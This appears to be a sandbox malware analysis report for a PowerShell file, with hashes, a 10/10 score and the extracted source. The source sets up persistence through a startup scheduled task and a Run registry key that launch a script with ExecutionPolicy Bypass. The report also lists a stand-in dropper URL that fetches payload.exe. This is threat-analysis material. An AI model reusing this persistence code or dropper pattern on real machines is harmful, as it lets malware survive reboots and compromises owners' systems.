General

  • Target

    code.ps1

  • Size

    3KB

  • MD5

    259ad591b830b483e84b4f995f35838e

  • SHA1

    39be4b78a4f7d7956d21a6917f1687dc77d7847b

  • SHA256

    865c27bc6fd0781cec11c4d0c0797e370a2e88f9db9f9aa25a72de7817a428fd

  • SHA512

    b4eeff16b50c6b0f60fcc21a70b5a95358f8b3399fc6a08576b5e3751489462daf373be789832cefedb73fe07f959c33c499ff9f32b5e6da54f57061140c32ee

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
# Create a persistent scheduled task
2
$taskName = "MaliciousTask"
3
$taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
4
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
5
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
6
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Settings $taskSettings
7
8
# Create a registry key for persistence
9
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousRegistryEntry" -Value "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
10
URLs
exe.dropper

http://malicious-server.com/payload.exe

Signatures

Files

  • code.ps1
    .ps1

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.